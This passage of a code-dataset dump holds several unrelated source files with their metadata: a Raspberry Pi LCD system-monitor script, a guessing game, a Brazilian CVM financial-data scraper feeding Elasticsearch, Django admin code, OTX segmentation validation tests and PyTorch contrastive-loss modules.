__init__(self,interface):\n\t\tself.last_updated = 0\n\t\tself.raw_dlold = 0\n\t\tself.raw_ulold = 0\n\t\tself.tdelta = 0\n\t\tself.maxdlspeed = 1000\n\t\tself.percent_speed = 0\n\t\tself.interface = interface\n\t\tMenuOption.__init__(self)\n\t\t\n\tdef begin(self):\n\t\tself.download = bytes2human(int(run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | awk '{ print $2 }' | cut -d':' -f2\")))\n\t\tself.upload = bytes2human(int(run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | awk '{ print $6 }' | cut -d':' -f2\")))\n\t\t\n\tdef redraw(self,menu):\n\t\t\n\t\tif self.millis() - self.last_updated > 1000:\n\t\t\ttdelta = self.millis() - self.last_updated\n\t\t\tself.last_updated = self.millis()\n\t\t\traw_dlnew = run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | cut -d':' -f2 | cut -d' ' -f1\")\n\t\t\traw_ulnew = run_cmd(\"ifconfig \" + self.interface + \" | grep bytes | cut -d':' -f3 | cut -d' ' -f1\")\n\t\t\tself.dlspeed = 0\n\t\t\tself.ulspeed = 0\n\t\t\ttry:\n\t\t\t\tddelta = int(raw_dlnew) - int(self.raw_dlold)\n\t\t\t\tudelta = int(raw_ulnew) - int(self.raw_ulold)\n\t\t\t\tself.dlspeed = round(float(ddelta) / float(tdelta), 1)\n\t\t\t\tself.ulspeed = round(float(udelta) / float(tdelta), 1)\n\t\t\texcept ValueError:\n\t\t\t\tpass\n\t\t\t\n\t\t\tif self.dlspeed > self.maxdlspeed:\n\t\t\t\tself.maxdlspeed = self.dlspeed\n\t\t\t\n\t\t\tself.percent_speed = self.dlspeed / self.maxdlspeed * 100\n\t\t\t#print \"speed %s / %s (%s)\" % (self.dlspeed,self.maxdlspeed,self.percent_speed)\n\t\t\tself.raw_dlold = raw_dlnew\n\t\t\tself.raw_ulold = raw_ulnew\n\t\t\n\t\tlcd_colour(self.percent_speed)\n\t\tmenu.write_row(0,'-= ' + self.interface + ' =-')\n\t\tmenu.write_row(1,'Dn:%s %skB/s' % (self.download,self.dlspeed))\n\t\tmenu.write_row(2,'Up:%s %skB/s' % (self.upload,self.ulspeed))\n\n#class sample_info(MenuOption):\n#\t\n#\tdef begin(self):\n#\t\tself.slowvar = run_cmd(\"\") # runs once per menu change, for slowly updating info\n#\t\t\n#\tdef redraw(self,menu):\n#\t\n#\t\tself.fastvar = run_cmd(\"\") # updated every screen refresh, for rapidly changing data\n#\t\n#\t\tlcd_colour(0)\t# displays warning colour background, set this to a range 0..100, 0 = green, 100 = red\n#\t\tmenu.write_row(0,'-= AFP =-')\n#\t\tmenu.write_row(1,'slow: %s' % self.slowvar)\n#\t\tmenu.write_row(2,'fast: %s' % self.fastvar)\n\nmenu = Menu({\n\t\t'1': cpu_info(),\n\t\t'2': memory_info(),\n\t\t'3': disk_info(),\n\t\t'4': network_info('wlan0'),\n\t\t'5': network_speed('wlan0'),\n\t\t'6': network_info('eth0'),\n\t\t'7': network_speed('eth0'),\n\t\t},\n\tlcd, None, 30)\n\nmenu_display_time = 4\t# in seconds\nupdate_frequency = 5\t# hz of screen update\nlast_cycled = 0\t\t\t# force immediate update of screen menu\n\n#try:\nwhile True:\n\tif millis() > last_cycled + (menu_display_time * 1000.0):\n\t\tmenu.cancel()\n\t\tmenu.down()\n\t\tmenu.right()\n\t\tlast_cycled = millis()\n\telse:\n\t\tmenu.redraw()\n\ttime.sleep(1 / float(update_frequency))\n#except:\n#\tlcd.clear()\n#\tbacklight.rgb(0,0,0)\n","sub_path":"pi_settings/display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":6744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"429039381","text":"import datetime\nimport random\nimport json\n\nplayer_name = input(f\"Hello, what's your name? \")\nsecret = random.randint(1, 30)\nattempts = 0\nwrong_guesses = []\n\nwith open(\"score_list.txt\", \"r\") as score_file:\n score_list = json.loads(score_file.read())\n ordered_score_list = sorted(score_list, key=lambda t: t['attempts'])[:3]\n\n for score_dict in ordered_score_list:\n print(f'attempts: {score_dict[\"attempts\"]}, date: {score_dict.get(\"date\")}, name: {score_dict.get(\"name\")}, secret number: {score_dict.get(\"secret_number\")}, wrong guesses: {score_dict.get(\"wrong_guesses\")}')\n\nwhile True:\n guess = int(input(\"Guess the secret number (between 1 and 30): \"))\n attempts += 1\n\n if guess == secret:\n print(f\"You've guessed it - congratulations! It's number {secret}\")\n print(f\"Attempts needed: {attempts}\")\n score_list.append(\n {\n \"attempts\": attempts,\n \"date\": str(datetime.datetime.now()),\n \"name\": player_name,\n \"secret_number\": secret,\n \"wrong_guesses\": wrong_guesses\n }\n )\n\n with open(\"score_list.txt\", \"w\") as score_file:\n score_file.write(json.dumps(score_list))\n break\n elif guess > secret:\n print(\"Your guess is not correct... try something smaller\")\n elif guess < secret:\n print(\"Your guess is not correct... try something bigger\")\n\n wrong_guesses.append(guess)\n","sub_path":"random_with_dict.py","file_name":"random_with_dict.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"82024817","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom utils import getEnterprises,getTables,header2Keys,openUrl,buildUrl,parseFinancialTable,getRows,rowToDict,configureLog,getAll\nfrom utils import URL_EDETAIL, URL_EPATH, URL_ES, INDEX_FD\nfrom lxml.html import fromstring, tostring, HtmlElement\nfrom datetime import datetime\nfrom elasticsearch import Elasticsearch\nimport re\nimport urlparse\nimport logging\nfrom requests.utils import quote\nfrom urllib import urlencode\n\n#URLS\nURL_RAD = 'https://www.rad.cvm.gov.br/ENET/'\nURL_DCC = URL_RAD + 'frmDadosComposicaoCapitalITR.aspx'\nURL_FDF = URL_RAD + 'frmDemonstracaoFinanceiraITR.aspx'\nURL_RDF = URL_EPATH + 'ResumoDemonstrativosFinanceiros.aspx'\nURL_DF = URL_EPATH + 'HistoricoFormularioReferencia.aspx'\n\n#DIVS\nDIV_DFPS = 'ctl00_contentPlaceHolderConteudo_divDemonstrativo'\nTABLE_BPP = 'ctl00_cphPopUp_tbDados'\n\n#REGEX\nRE_PT1 = re.compile(\"[^']+'([^']+)'\\)\")\nRE_LOC = re.compile(\"window.frames\\[0\\]\\.location='([^']+)'\")\n\nPARMS_GERAL = 'Grupo=.&Quadro=.&NomeTipoDocumento=.&Titulo=.&Empresa=.&DataReferencia=.&Versao=.'\nPARMS_GERAL_ITR = 'Grupo=.&Quadro=.&NomeTipoDocumento=ITR&Titulo=.&Empresa=.&DataReferencia=.&Versao=.'\nPARMS_BPP = 'Periodo=0&CodTipoDocumento=4&CodigoTipoInstituicao=2'\n\ndef mycmp(x, y):\n return cmp(x['date'], y['date']) if x['date'] != y['date'] else cmp(x['version'], y['version'])\n\ndef parseFd(fd):\n d = fd.text.split(' - ')\n v = d[2].split()\n v = 0.0 if len(v) < 2 else float(v[1])\n return {'date': datetime.strptime(d[0], '%d/%m/%Y'), 'type': d[1], 'version': v, \n 'url': RE_PT1.match(fd.get('href')).group(1)}\n\ndef getDFPs(edp):\n page = openUrl(buildUrl(URL_DF, 'codigoCVM=' + edp, 'idioma=pt-br', 'tipo=dfp'))\n return [parseFd(dfp) for dfp in page.findall('.//div[@id=\"' + DIV_DFPS + '\"]/div/div/div/div/p/a')]\n\ndef getITRs(edp):\n page = openUrl(buildUrl(URL_DF, 'codigoCVM=' + edp, 'idioma=pt-br', 'tipo=itr'))\n return [parseFd(itr) for itr in page.findall('.//div[@id=\"' + DIV_DFPS + '\"]/div/div/div/div/p/a')]\n\ndef toInt(n):\n if n == '': return 0\n return int(n.replace('.', ''))\n\ndef getMultiplicador(root):\n em = HtmlElement(root).get_element_by_id('TituloTabelaSemBorda')\n return 1000 if em is not None and em.text.find('Mil') != -1 else 1\n\ndef getFdByIdAndYear(es, companyid, year, document_type='DFP'):\n logging.info('Getting financial data for company id %s and year %s', companyid, year)\n query = 'id: {0} AND period: {1}'.format(companyid, year)\n ret = [i for i in getAll(es, index=INDEX_FD, doc_type=document_type, q=query)]\n return ret[0] if len(ret) > 0 else None\n\n\ndef getDfpConBPA(url, infos):\n logging.info('Getting DFs Consolidadas - Balanco Patrimonial Ativo')\n t = dict()\n page = HtmlElement(openUrl(url)) \n table = page.get_element_by_id(TABLE_BPP)\n for row in getRows(table): rowToDict(row, t)\n\n # Multiplicador\n m = getMultiplicador(page)\n\n # Caixa\n cxa = toInt(t['1.01.01'][1])*m if '1.01.01' in t else 0\n apf = toInt(t['1.01.02'][1])*m if '1.01.02' in t else 0\n infos['CAIXA'] = cxa + apf\n\ndef getDfpConBPP(url, infos):\n logging.info('Getting DFs Consolidadas - Balanco Patrimonial Passivo')\n t = dict()\n page = openUrl(url) \n table = HtmlElement(page).get_element_by_id(TABLE_BPP)\n for row in getRows(table): rowToDict(row, t)\n\n # Multiplicador\n m = getMultiplicador(page)\n\n # Patrimonio Liquido\n infos['PL'] = toInt(t['2.03'][1])*m if '2.03' in t else 0\n # Divida Bruta\n CP = toInt(t['2.01.04'][1])*m if '2.01.04' in t else 0\n LP = toInt(t['2.02.01'][1])*m if '2.02.01' in t else 0\n infos['DB'] = CP + LP\n # Dividendos\n Div = toInt(t['2.01.05.02.01'][1])*m if '2.01.05.02.01' in t else 0\n infos['DIV'] = Div\n\ndef getDftDemRes(url, infos):\n logging.info('Getting DFs Consolidadas - Demonstracao do Resultado')\n t = dict()\n page = openUrl(url) \n table = HtmlElement(page).get_element_by_id(TABLE_BPP)\n for row in getRows(table): rowToDict(row, t)\n\n # Multiplicador\n m = getMultiplicador(page)\n\n # Receita Liquida\n infos['RL'] = toInt(t['3.01'][1])*m if '3.01' in t else 0\n # Lucro Liquito\n infos['LL'] = next((toInt(v[1])*m for k,v in t.iteritems() if re.match('^Lucro.+odo$', v[0])), 0)\n\ndef getDaeCc(nsd, nsr, infos):\n logging.info('Getting Dados da Empresa - Composicao do Capital - %s %s', nsd, nsr)\n page = HtmlElement(openUrl(buildUrl(URL_DCC, PARMS_GERAL, PARMS_BPP, PARMS_BPP,\n 'NumeroSequencialDocumento=' + nsd, 'NumeroSequencialRegistroCvm=' + nsr)))\n \n # Multiplicador \n em = page.xpath('.//div[@id=\"UltimaTabela\"]/table/tr/td/b/text()')\n m = 1000 if len(em) > 0 and em[0].find('(Mil)') != -1 else 1\n\n for i in ['QtdAordCapiItgz', 'QtdAprfCapiItgz', 'QtdTotAcaoCapiItgz', 'QtdAordTeso', 'QtdAprfTeso', 'QtdTotAcaoTeso']: \n qnt = page.get_element_by_id('ctl00_cphPopUp_{0}_1'.format(i))\n infos[i] = 0 if qnt is None else toInt(qnt.text) * m\n\ndef escapeUrl(url):\n up = urlparse.urlparse(url)\n upl = urlparse.parse_qsl(up.query)\n up2 = up._replace(query=urlencode(upl))\n return up2.geturl()\n\ndef getLinks(url):\n resp = dict()\n trp = openUrl(url, True)\n url_fdf = RE_LOC.search(trp).group(1)\n\n params = urlparse.parse_qs(urlparse.urlparse(url_fdf).query)\n resp['ctd'] = params['CodTipoDocumento'][0]\n resp['nsd'] = params['NumeroSequencialDocumento'][0]\n resp['nsr'] = params['NumeroSequencialRegistroCvm'][0]\n resp['cti'] = params['CodigoTipoInstituicao'][0]\n fparams = '&CodTipoDocumento={0}&NumeroSequencialDocumento={1}&'\\\n 'NumeroSequencialRegistroCvm={2}&CodigoTipoInstituicao={3}'.\\\n format(resp['ctd'], resp['nsd'], resp['nsr'], resp['cti'])\n \n for i in re.findall('\"Text\":\"([^\"]+)\",\"Value\":\"([^\"]+)\"', trp):\n if re.match('^Balan.+Ativo$', i[0]): resp['dfp_bpa'] = escapeUrl(URL_RAD + i[1] + fparams)\n if re.match('^Balan.+Passivo$', i[0]): resp['dfp_bpp'] = escapeUrl(URL_RAD + i[1] + fparams)\n if re.match('^Demonstra.+Resultado$', i[0]): resp['dfp_dr'] = escapeUrl(URL_RAD + i[1] + fparams)\n \n return resp\n\n# Infos By Year\ndef getDfpInfos(edp):\n logging.info('Getting DFP Infos for %s', edp)\n # Getting newer version of documents\n dfps = dict([(i['date'], i) for i in sorted(getDFPs(edp), cmp=mycmp) if i['version'] > 0.0])\n for year, dfp in dfps.iteritems():\n logging.info('Getting DFP of %s for %s', edp, year.year)\n if getFdByIdAndYear(es, edp, year.year) != None:\n logging.info('Already have DFP, skiping...')\n continue \n\n # Get NSD and NSR\n links = getLinks(dfp['url'])\n\n infos = dict()\n infos['id'] = edp\n infos['period'] = str(year.year)\n infos['ptype'] = 'DFP'\n # Get Infos From DFPs Consolidadas - Balanco Patrimonial Ativo\n getDfpConBPA(links['dfp_bpa'], infos)\n # Get Infos From DFPs Consolidadas - Balanco Patrimonial Passivo\n getDfpConBPP(links['dfp_bpp'], infos)\n # Get Infos From DFPs Consolidadas - Demonstracao do Resultado\n getDftDemRes(links['dfp_dr'], infos)\n # Get Infos From Dados da Empresa - Composicao do Capital\n getDaeCc(links['nsd'], links['nsr'], infos)\n \n yield infos\n \n# Infos By Trimestre\ndef getItrInfos(edp):\n logging.info('Getting ITR Infos for %s', edp)\n \n # Getting newer version of documents\n itrs = dict([(i['date'], i) for i in sorted(getITRs(edp), cmp=mycmp) if i['version'] > 0.0])\n for dt, itr in itrs.iteritems():\n tm = '{:%Y%m}'.format(dt)\n logging.info('Getting ITR of %s for %s', edp, tm)\n\n if getFdByIdAndYear(es, edp, tm, 'ITR') != None:\n logging.info('Already have ITR, skiping...')\n continue\n\n # Get NSD and NSR\n links = getLinks(itr['url'])\n\n infos = dict()\n infos['id'] = edp\n infos['period'] = tm\n infos['ptype'] = 'ITR'\n # Get Infos From DFPs Consolidadas - Balanco Patrimonial Ativo\n getDfpConBPA(links['dfp_bpa'], infos)\n # Get Infos From DFPs Consolidadas - Balanco Patrimonial Passivo\n getDfpConBPP(links['dfp_bpp'], infos)\n # Get Infos From DFPs Consolidadas - Demonstracao do Resultado\n getDftDemRes(links['dfp_dr'], infos)\n # Get Infos From Dados da Empresa - Composicao do Capital\n getDaeCc(links['nsd'], links['nsr'], infos)\n \n yield infos\n\ndef getInfos(enterprise):\n edp = enterprise[0]\n for i in getDfpInfos(edp): yield i\n for i in getItrInfos(edp): yield i\n\ndef saveInfos(es, e):\n logging.info('Saving Enterprise %s period %s', e['id'], e['period'])\n e['register_date'] = datetime.now()\n eid = '{0}-{1}'.format(e['id'], e['period'])\n es.index(index=INDEX_FD, id=eid, doc_type=e['ptype'], body=e)\n\nif __name__ == '__main__':\n configureLog()\n\n es = Elasticsearch([URL_ES])\n for enterprise in getEnterprises():\n try:\n logging.info('Getting Company %s', str(enterprise[0]))\n for info in getInfos(enterprise): saveInfos(es, info)\n except Exception as error: \n logging.error('Exception Getting Company %s', error)\n\n logging.info('Done, exiting...')\n","sub_path":"src/getfinancialdata.py","file_name":"getfinancialdata.py","file_ext":"py","file_size_in_byte":9235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"392405323","text":"from django.contrib import admin\n\n# Register your models here.\nfrom django.contrib import admin\nfrom .models import Image, Comment, Like\n# Register your models here.\n\n@admin.register(Image)\nclass Image_Admin(admin.ModelAdmin):\n list_display_links = (\n 'location',\n )\n\n list_display = (\n 'id',\n 'file',\n 'location',\n 'caption',\n 'creator',\n 'created_at',\n 'updated_at'\n )\n\n@admin.register(Comment)\nclass Comment_Admin(admin.ModelAdmin):\n pass\n\n@admin.register(Like)\nclass Like_Admin(admin.ModelAdmin):\n\n list_display = (\n 'creator',\n 'image',\n )\n","sub_path":"nomadgram/nomadgram/images/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"16263361","text":"import random\r\n\r\nn1 = random.randrange(1,10);\r\nn2 = random.randrange(1,17);\r\nif(n1>n2):\r\n\tif(n1>5):\r\n\t\tprint('greater than 5')\r\n\telse:\r\n\t\t('greater than n2 but not greater than 5')\r\nelse:\r\n\tprint('less than n2')\r\n\r\nif(n2>n1):\r\n\tprint(\"n2 is greater\")\r\nelse:\r\n\tprint(\"n1 is greater\")\r\n\r\nif(n2>n1):\r\n\tprint(\"n1 is best\")\r\nelif(n2>(n1+2)):\r\n\tprint(\"pretty cool!\")\r\nelse:\r\n\tprint('n2 is best')","sub_path":"PythonPracsTy/prac3.py","file_name":"prac3.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"114585172","text":"# Copyright (C) 2021-2023 Intel Corporation\n# SPDX-License-Identifier: Apache-2.0\n#\nimport numpy as np\nimport pytest\n\nfrom otx.algorithms.segmentation.adapters.mmseg.data.dataset import (\n OTXSegDataset,\n get_annotation_mmseg_format,\n)\nfrom otx.api.entities.annotation import (\n Annotation,\n AnnotationSceneEntity,\n AnnotationSceneKind,\n)\nfrom otx.api.entities.dataset_item import DatasetItemEntity\nfrom otx.api.entities.datasets import DatasetEntity\nfrom otx.api.entities.image import Image\nfrom otx.api.entities.label import Domain, LabelEntity\nfrom otx.api.entities.scored_label import ScoredLabel\nfrom otx.api.entities.shapes.rectangle import Rectangle\nfrom tests.test_suite.e2e_test_system import e2e_pytest_unit\nfrom tests.unit.api.parameters_validation.validation_helper import (\n check_value_error_exception_raised,\n)\n\n\ndef label_entity():\n return LabelEntity(name=\"test label\", domain=Domain.SEGMENTATION)\n\n\ndef dataset_item():\n image = Image(data=np.random.randint(low=0, high=255, size=(10, 16, 3)))\n annotation = Annotation(shape=Rectangle.generate_full_box(), labels=[ScoredLabel(label_entity())])\n annotation_scene = AnnotationSceneEntity(annotations=[annotation], kind=AnnotationSceneKind.ANNOTATION)\n return DatasetItemEntity(media=image, annotation_scene=annotation_scene)\n\n\nclass TestOTXSegDatasetInputParamsValidation:\n @staticmethod\n def dataset():\n return OTXSegDataset(\n otx_dataset=DatasetEntity(),\n pipeline=[{\"type\": \"LoadImageFromFile\", \"to_float32\": True}],\n classes=[\"class_1\", \"class_2\"],\n )\n\n @e2e_pytest_unit\n def test_otx_dataset_init_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object initialization parameters validation\n\n Input data:\n OTXSegDataset object initialization parameters with unexpected type\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n OTXSegDataset object initialization parameter\n \"\"\"\n correct_values_dict = {\n \"otx_dataset\": DatasetEntity(),\n \"pipeline\": [{\"type\": \"LoadImageFromFile\", \"to_float32\": True}],\n }\n unexpected_str = \"unexpected string\"\n unexpected_int = 1\n unexpected_values = [\n # Unexpected string is specified as \"otx_dataset\" parameter\n (\"otx_dataset\", unexpected_str),\n # Unexpected integer is specified as \"pipeline\" parameter\n (\"pipeline\", unexpected_int),\n # Unexpected string is specified as nested pipeline\n (\"pipeline\", [{\"config\": 1}, unexpected_str]),\n # Unexpected string is specified as \"classes\" parameter\n (\"classes\", unexpected_str),\n # Unexpected string is specified as nested class\n (\"classes\", [\"class_1\", unexpected_int]),\n # Unexpected string is specified as \"test_mode\" parameter\n (\"test_mode\", unexpected_str),\n ]\n check_value_error_exception_raised(\n correct_parameters=correct_values_dict,\n unexpected_values=unexpected_values,\n class_or_function=OTXSegDataset,\n )\n\n @e2e_pytest_unit\n def test_otx_dataset_filter_labels_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"filter_labels\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"filter_labels\" method unexpected parameters\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"filter_labels\" method\n \"\"\"\n label = label_entity()\n dataset = self.dataset()\n correct_values_dict = {\n \"all_labels\": [label],\n \"label_names\": [\"label_1\", \"label_2\"],\n }\n unexpected_int = 1\n unexpected_values = [\n # Unexpected integer is specified as \"all_labels\" parameter\n (\"all_labels\", unexpected_int),\n # Unexpected integer is specified as nested label\n (\"all_labels\", [label, unexpected_int]),\n # Unexpected integer is specified as \"label_names\" parameter\n (\"label_names\", unexpected_int),\n # Unexpected integer is specified as nested name\n (\"label_names\", [\"label_1\", unexpected_int]),\n ]\n check_value_error_exception_raised(\n correct_parameters=correct_values_dict,\n unexpected_values=unexpected_values,\n class_or_function=dataset.filter_labels,\n )\n\n @e2e_pytest_unit\n def test_otx_dataset_pre_pipeline_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"pre_pipeline\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"results\" unexpected type object\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"pre_pipeline\" method\n \"\"\"\n dataset = self.dataset()\n unexpected_int = 1\n for unexpected_value in [\n # Unexpected integer is specified as \"results\" parameter\n unexpected_int,\n # Unexpected integer is specified as \"results\" dictionary key\n {\"result_1\": \"some results\", unexpected_int: \"unexpected results\"},\n ]:\n with pytest.raises(ValueError):\n dataset.pre_pipeline(results=unexpected_value)\n\n @e2e_pytest_unit\n def test_otx_dataset_prepare_train_img_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"prepare_train_img\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"idx\" non-integer type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"prepare_train_img\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.prepare_train_img(idx=\"unexpected string\") # type: ignore\n\n @e2e_pytest_unit\n def test_otx_dataset_prepare_test_img_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"prepare_test_img\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"idx\" non-integer type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"prepare_test_img\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.prepare_test_img(idx=\"unexpected string\") # type: ignore\n\n @e2e_pytest_unit\n def test_otx_dataset_get_ann_info_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"get_ann_info\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"idx\" non-integer type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"get_ann_info\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.get_ann_info(idx=\"unexpected string\") # type: ignore\n\n @e2e_pytest_unit\n def test_otx_dataset_get_gt_seg_maps_params_validation(self):\n \"\"\"\n Description:\n Check OTXSegDataset object \"get_gt_seg_maps\" method input parameters validation\n\n Input data:\n OTXSegDataset object, \"efficient_test\" non-bool type parameter\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"get_gt_seg_maps\" method\n \"\"\"\n dataset = self.dataset()\n with pytest.raises(ValueError):\n dataset.get_gt_seg_maps(efficient_test=\"unexpected string\") # type: ignore\n\n\nclass TestMMDatasetFunctionsInputParamsValidation:\n @e2e_pytest_unit\n def test_get_annotation_mmseg_format_input_params_validation(self):\n \"\"\"\n Description:\n Check \"get_annotation_mmseg_format\" function input parameters validation\n\n Input data:\n \"get_annotation_mmseg_format\" function unexpected-type input parameters\n\n Expected results:\n Test passes if ValueError exception is raised when unexpected type object is specified as\n input parameter for \"get_annotation_mmseg_format\" function\n \"\"\"\n label = label_entity()\n correct_values_dict = {\n \"dataset_item\": dataset_item(),\n \"labels\": [label],\n }\n unexpected_int = 1\n unexpected_values = [\n # Unexpected integer is specified as \"dataset_item\" parameter\n (\"dataset_item\", unexpected_int),\n # Unexpected integer is specified as \"labels\" parameter\n (\"labels\", unexpected_int),\n # Unexpected integer is specified as nested label\n (\"labels\", [label, unexpected_int]),\n ]\n check_value_error_exception_raised(\n correct_parameters=correct_values_dict,\n unexpected_values=unexpected_values,\n class_or_function=get_annotation_mmseg_format,\n )\n","sub_path":"tests/unit/algorithms/segmentation/adapters/mmseg/test_dataset_params_validation.py","file_name":"test_dataset_params_validation.py","file_ext":"py","file_size_in_byte":9654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"481034163","text":"\"\"\"\nAuthor: Nasir Hayat (nasirhayat6160@gmail.com)\nDate: June 10, 2020\n\"\"\"\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom numpy import linalg as LA\n\n\nclass AttFeatsCon(nn.Module):\n def __init__(self):\n super(AttFeatsCon, self).__init__()\n self.att = np.load('/raid/mun/codes/zero_shot_detection/zsd_abl/MSCOCO/fasttext.npy')\n # self.att/=LA.norm(self.att, ord=2)\n\n device = (torch.device('cuda')\n if torch.cuda.is_available()\n else torch.device('cpu'))\n\n self.att = torch.from_numpy(self.att).to(device)\n self.temperature = 0.05\n\n def get_random_noise(self, bs, att_dim):\n \"\"\"\n returns normal initialized noise tensor \n \"\"\"\n z = torch.cuda.FloatTensor(bs, att_dim)\n z.normal_(0, 1)\n return z\n\n def forward(self, features, labels=None):\n device = (torch.device('cuda')\n if features.is_cuda\n else torch.device('cpu'))\n\n # import pdb; pdb.set_trace()\n\n # normalize features \n features = F.normalize(features, p=2, dim=1)\n\n att = self.att[labels]\n noise = self.get_random_noise(att.shape[0], att.shape[1])\n \n att = torch.cat((noise, att), 1)\n\n att = F.normalize(att, p=2, dim=1)\n\n\n labels = labels[:, None] # extend dim\n\n mask = torch.eq(labels, labels.t()).byte().to(device)\n\n eye = torch.eye(mask.shape[0], mask.shape[1]).byte().to(device)\n \n mask_pos = mask.masked_fill(eye, 0).float()\n\n mask_neg = (~mask).float()\n\n # mask_neg.masked_fill_(eye, 0)\n dot_prod_feats = torch.matmul(features, features.t())\n dot_prod_att = torch.matmul(att, att.t())\n \n\n # pos_pairs_mean = (mask_pos * dot_prod).sum() / (mask_pos.sum() + 1e-6)\n # feats_neg_pairs = (mask_neg * dot_prod_feats).sum() / (mask_neg.sum() + 1e-6)\n # att_neg_pairs_mean = (mask_neg * dot_prod_att).sum() / (mask_neg.sum() + 1e-6)\n\n # loss = torch.abs((feats_neg_pairs_mean - att_neg_pairs_mean))\n \n # dist = (dot_prod_feats - dot_prod_att) * (dot_prod_feats - dot_prod_att)\n # dist = torch.exp(dist / self.temperature)\n \n dist = torch.exp(torch.abs(dot_prod_feats - dot_prod_att) / self.temperature)\n pos = torch.sum(dist * mask_pos) / (mask_pos.sum() + 1e-6)\n neg = torch.sum(dist * mask_neg) / (mask_neg.sum() + 1e-6)\n\n # loss = torch.sum(abs_dist*mask_neg) / (mask_neg.sum() + 1e-6)\n # loss += torch.sum(abs_dist*mask_pos) / (mask_pos.sum() + 1e-6)\n\n loss = (- torch.log(pos / (pos + neg) )).mean()\n\n # loss = torch.sum(torch.abs(dot_prod_feats - dot_prod_att)*mask_neg) / (mask_neg.sum() + 1e-6)\n # loss = torch.sum(torch.square(dot_prod_feats - dot_prod_att)*mask_neg) / (mask_neg.sum() + 1e-6)\n # loss = 0.0 * (1.0 - pos_pairs_mean) + (1.0+ neg_pairs_mean)\n\n return loss\n\n\n\n\nclass ConLossReal(nn.Module):\n def __init__(self, features_mean):\n super(ConLossReal, self).__init__()\n self.device = (torch.device('cuda')\n if torch.cuda.is_available()\n else torch.device('cpu'))\n self.seen_feats_mean = F.normalize(torch.from_numpy(features_mean), p=2, dim=1).float().to(self.device)\n\n def forward(self, features, labels=None):\n \n\n # import pdb; pdb.set_trace()\n\n # normalize features \n\n features = F.normalize(features, p=2, dim=1)\n\n dot_prod = torch.matmul(features, self.seen_feats_mean[labels].t())\n\n\n labels = labels[:, None] # extend dim\n\n mask = torch.eq(labels, labels.t()).byte().to(self.device)\n\n eye = torch.eye(mask.shape[0], mask.shape[1]).byte().to(self.device)\n \n mask_pos = mask.masked_fill(eye, 0).float()\n\n mask_neg = (~mask).float()\n # mask_neg.masked_fill_(eye, 0)\n \n\n # q=mask_pos * dot_prod\n # q[q>0.89]=1.0\n\n\n pos_pairs_mean = (mask_pos * dot_prod).sum() / (mask_pos.sum() + 1e-6)\n neg_pairs_mean = (mask_neg * dot_prod).sum() / (mask_neg.sum() + 1e-6)\n\n loss = (1.0 - pos_pairs_mean) + (1.0+ neg_pairs_mean)\n\n return loss\n\n\nclass SupConLoss(nn.Module):\n def __init__(self):\n super(SupConLoss, self).__init__()\n\n def forward(self, features, labels=None):\n device = (torch.device('cuda')\n if features.is_cuda\n else torch.device('cpu'))\n\n # import pdb; pdb.set_trace()\n\n # normalize features \n features = F.normalize(features, p=2, dim=1)\n\n labels = labels[:, None] # extend dim\n\n mask = torch.eq(labels, labels.t()).byte().to(device)\n\n eye = torch.eye(mask.shape[0], mask.shape[1]).byte().to(device)\n \n mask_pos = mask.masked_fill(eye, 0).float()\n\n mask_neg = (~mask).float()\n # mask_neg.masked_fill_(eye, 0)\n dot_prod = torch.matmul(features, features.t())\n \n\n pos_pairs_mean = (mask_pos * dot_prod).sum() / (mask_pos.sum() + 1e-6)\n neg_pairs_mean = (mask_neg * dot_prod).sum() / (mask_neg.sum() + 1e-6)\n\n loss = (1.0 - pos_pairs_mean) + (1.0+ neg_pairs_mean)\n\n return loss\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# class SupConLoss(nn.Module):\n# \"\"\"Supervised Contrastive Learning: https://arxiv.org/pdf/2004.11362.pdf.\n# It also supports the unsupervised contrastive loss in SimCLR\"\"\"\n# def __init__(self, temperature=0.07, contrast_mode='all',\n# base_temperature=0.07):\n# super(SupConLoss, self).__init__()\n# self.temperature 